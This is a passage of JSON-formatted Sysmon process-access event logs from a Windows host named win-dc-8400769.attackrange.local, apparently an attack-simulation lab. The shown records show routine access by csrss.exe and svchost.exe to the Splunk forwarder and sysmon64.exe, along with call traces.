Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8788,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A0-5F25-0000-001033991000}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A0-5F25-0000-001033991000}","TargetProcessId":"2512","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8789,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8790,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8791,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8792,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8793,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8794,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8795,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8796,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 